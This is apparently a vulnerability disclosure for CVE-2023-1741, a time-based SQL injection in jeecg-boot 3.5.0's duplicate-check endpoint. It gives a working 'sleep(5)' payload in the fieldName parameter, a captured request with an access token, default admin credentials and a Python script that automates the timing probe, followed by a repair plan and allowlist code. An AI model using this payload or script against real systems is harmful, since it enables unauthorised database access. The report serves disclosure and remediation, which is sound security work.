CVE-2023-1741: report/README.md at main · private-null/report
A vulnerability was found in jeecg-boot 3.5.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file SysDictMapper.java of the component Sleep Command Handler. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224629 was assigned to this vulnerability.
SQL injection exists in the back-end (admin) interface of Jeecg-boot 3.5.0

Environment deployment
Download the source code
https://github.com/jeecgboot/jeecg-boot/releases/tag/v3.5.0
Open the source tree in IntelliJ IDEA
Configure the pom.xml and reload the Maven dependencies
Once the green run arrow appears, launch the project
Vulnerability discovery
Global search for ${ (MyBatis string substitution, as opposed to the #{ bind-parameter syntax)
jeecg-boot-3.5.0/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/mapper/xml/SysDictMapper.xml
Line 106 contains a statement whose table and column names are spliced in as ${} variables
Click the duplicateCheckCountSqlNoDataId id of that statement to jump to the method of the same name in SysDictMapper.java
jeecg-boot-3.5.0/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/mapper/SysDictMapper.java
Click the duplicateCheckCountSqlNoDataId method to jump to its caller, the DuplicateCheckController controller
jeecg-boot-3.5.0/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/DuplicateCheckController.java
The code logic is roughly: the GET handler accepts the request parameters and, on line 55, passes them through a SqlInjectionUtil keyword filter before handing them to the mapper. The filter blocks a set of SQL keywords but not sleep, so a time-based payload in a parameter that is spliced with ${} reaches the database unchanged.
Testing the front-end interface showed that it requires an X-Access-Token header; without one the request is rejected
Obtain the captcha image (the trailing value in the URL is the checkKey that must be echoed back at login)
http://192.168.1.103:8080/jeecg-boot/sys/randomImage/9169ea44fee2e773df644053d67c94a1
Copy the image data from the response body (a base64 data URI) into the browser address bar to read the captcha
Access the back-end login endpoint
http://192.168.1.103:8080/jeecg-boot/sys/login
GET is not supported, so change the captured request to POST in Burp Suite
Get the token
Add the header Content-Type: application/json and send the following POST body
{
"username":"admin",
"password":"123456",
"remember_me":"true",
"captcha":"mYUw",
"checkKey":"9169ea44fee2e773df644053d67c94a1"
}
Access the vulnerable interface (the Knife4j API-doc page for doDuplicateCheckUsingGET; the percent-encoded path segment decodes to 重复校验, "duplicate check")
http://192.168.1.103:8080/jeecg-boot/#/default/%E9%87%8D%E5%A4%8D%E6%A0%A1%E9%AA%8C/doDuplicateCheckUsingGET
Set the X-Access-Token header to the token obtained above
Send the request and capture it
A normal value returns without delay
Entering 1 and%09sleep(5) as fieldName (a tab, %09, in place of the space) delays the response by about five seconds
Captured request:
GET /jeecg-boot/sys/duplicate/check?dataId=2000&fieldName=1+and%09sleep(5)&fieldVal=1000&tableName=sys_log HTTP/1.1
Host: 192.168.1.103:8080
Content-Type: application/x-www-form-urlencoded
Accept: */*
knife4j-gateway-code: ROOT
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2Nzk2NDM4OTUsInVzZXJuYW1lIjoiYWRtaW4ifQ.xJCpEt2pg3Zs5MdMYwcggZ85uLZcziQm_Ed1RQyC0kU
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.51
Request-Origion: Knife4j
Referer: http://192.168.1.103:8080/jeecg-boot/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
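The token-and-probe procedure above (JSON login with the captcha checkKey, X-Access-Token header, tab-separated sleep payload in fieldName) as a Python reproduction script that confirms the delay with a timing comparison. This is an added example, not code from the report or from jeecg-boot: the host, captcha value, the three-request median and the 0.8 tolerance factor are my assumptions, and the JWT must be pasted in from a real /sys/login response.

```python
import json
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request

# Constructed lab values; substitute your own host. The token is passed on the command line.
BASE = "http://192.168.1.103:8080/jeecg-boot"
SLEEP_SECONDS = 5
# The report's payload: a tab (%09 on the wire) stands in for the space before sleep().
PAYLOAD = f"1 and\tsleep({SLEEP_SECONDS})"


def login_body(username: str, password: str, captcha: str, check_key: str) -> bytes:
    # Same JSON shape as the report's login request; remember_me is sent as the string "true".
    return json.dumps({
        "username": username,
        "password": password,
        "remember_me": "true",
        "captcha": captcha,
        "checkKey": check_key,
    }).encode()


def duplicate_check_url(base: str, table_name: str, field_name: str,
                        field_val: str = "1000", data_id: str = "2000") -> str:
    # Parameter order matches the captured request; urlencode turns the tab into %09
    # and the space into +, exactly as the report's GET line shows.
    query = urllib.parse.urlencode({
        "dataId": data_id,
        "fieldName": field_name,
        "fieldVal": field_val,
        "tableName": table_name,
    })
    return f"{base}/sys/duplicate/check?{query}"


def timed_get(url: str, token: str) -> float:
    # Wall-clock duration of one authenticated GET; the header name is the one the report shows.
    req = urllib.request.Request(url, headers={"X-Access-Token": token})
    start = time.monotonic()
    try:
        urllib.request.urlopen(req, timeout=SLEEP_SECONDS * 4).read()
    except urllib.error.HTTPError as e:
        # A 401/403 here means the token is missing or expired, not that the payload failed.
        raise RuntimeError(f"HTTP {e.code} from {url}: check X-Access-Token") from e
    return time.monotonic() - start


def is_time_based_injectable(baseline: list, injected: list,
                             sleep_seconds: int = SLEEP_SECONDS) -> bool:
    # Compare medians so one slow network round-trip cannot fake a positive, and require
    # most of the sleep interval (0.8 is an assumed tolerance) to show up as extra delay.
    return statistics.median(injected) - statistics.median(baseline) >= sleep_seconds * 0.8


if __name__ == "__main__":
    import sys
    token = sys.argv[1]  # paste the JWT returned by /sys/login
    benign = duplicate_check_url(BASE, "sys_log", "1")
    evil = duplicate_check_url(BASE, "sys_log", PAYLOAD)
    baseline = [timed_get(benign, token) for _ in range(3)]
    injected = [timed_get(evil, token) for _ in range(3)]
    print("baseline seconds:", baseline)
    print("injected seconds:", injected)
    print("time-based SQL injection confirmed:", is_time_based_injectable(baseline, injected))
```

Run it as `python probe.py <token>` against the lab host only; the captcha step stays manual (fetch randomImage, read the image, POST login_body(...) to /sys/login) because the captcha is meant to defeat automation.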
Repair plan
Add and, sleep and if to the keywords filtered by SqlInjectionUtil. Note that a keyword blacklist remains fragile: case variants, inline comments and other delay primitives such as MySQL's benchmark() are not covered by three more words. Because MyBatis cannot bind identifiers with #{}, the robust fix is to validate tableName and fieldName against an allowlist of the tables and columns the duplicate check is meant to serve before they are substituted into the statement.
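The root cause described under vulnerability discovery (${} string substitution of tableName and fieldName, guarded only by a keyword blacklist that misses sleep) and the repair plan, side by side in Python. This is an added example, not code from the report or from jeecg-boot: the SQL text of the count statement, the contents of the blacklist and the table/column schema map are constructed assumptions that model what the report describes, not the project's actual SqlInjectionUtil or mapper.

```python
import re

# Constructed model of the vulnerable mapper statement. The report says line 106 of
# SysDictMapper.xml splices the table and column names in with ${}; the exact SQL text
# here is an assumption for illustration, not copied from jeecg-boot.
def build_count_sql_vulnerable(table_name: str, field_name: str) -> str:
    # ${} in MyBatis is plain string substitution, so whatever the caller sends lands in the
    # SQL verbatim. fieldVal is assumed to be bound with #{} and is shown as the '?' placeholder.
    return f"SELECT COUNT(*) FROM {table_name} WHERE {field_name} = ?"


# Constructed model of a keyword blacklist of the kind the report describes: several SQL
# verbs are blocked, but 'and', 'sleep' and 'if' are not. Not jeecg-boot's real filter.
BLACKLIST = ("select", "update", "delete", "insert", "drop", "exec", "union", "--", ";")


def blacklist_filter_passes(value: str) -> bool:
    lowered = value.lower()
    return not any(word in lowered for word in BLACKLIST)


# Hardened alternative: identifiers cannot be bound as parameters, so validate them against
# an allowlist of the tables and columns the duplicate check is actually meant to serve.
# The schema map below is constructed for the example.
ALLOWED_COLUMNS = {
    "sys_log": {"id", "log_type", "create_by"},
    "sys_user": {"id", "username", "realname"},
}
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,63}$")


def validate_identifier(table_name: str, field_name: str) -> bool:
    # Shape check first (rejects tabs, spaces, parentheses), then membership in the allowlist.
    if not (IDENT_RE.match(table_name) and IDENT_RE.match(field_name)):
        return False
    return field_name in ALLOWED_COLUMNS.get(table_name, set())


def build_count_sql_hardened(table_name: str, field_name: str) -> str:
    if not validate_identifier(table_name, field_name):
        raise ValueError("table or column not in allowlist")
    # Backticks are MySQL identifier quoting; safe here only because the names were allowlisted.
    return f"SELECT COUNT(*) FROM `{table_name}` WHERE `{field_name}` = ?"


PAYLOAD = "1 and\tsleep(5)"  # the report's fieldName value, tab (%09) in place of a space

if __name__ == "__main__":
    print(build_count_sql_vulnerable("sys_log", PAYLOAD))
    print("blacklist lets the payload through:", blacklist_filter_passes(PAYLOAD))
    print("allowlist accepts the payload:", validate_identifier("sys_log", PAYLOAD))
    print(build_count_sql_hardened("sys_log", "log_type"))
```

The blacklist lets the payload through because the string contains none of its words, and the spliced query becomes `SELECT COUNT(*) FROM sys_log WHERE 1 and sleep(5) = ?`, which makes MySQL evaluate sleep(5) per row. The allowlist rejects it on shape alone and would also reject a syntactically clean column name that the check is not supposed to expose.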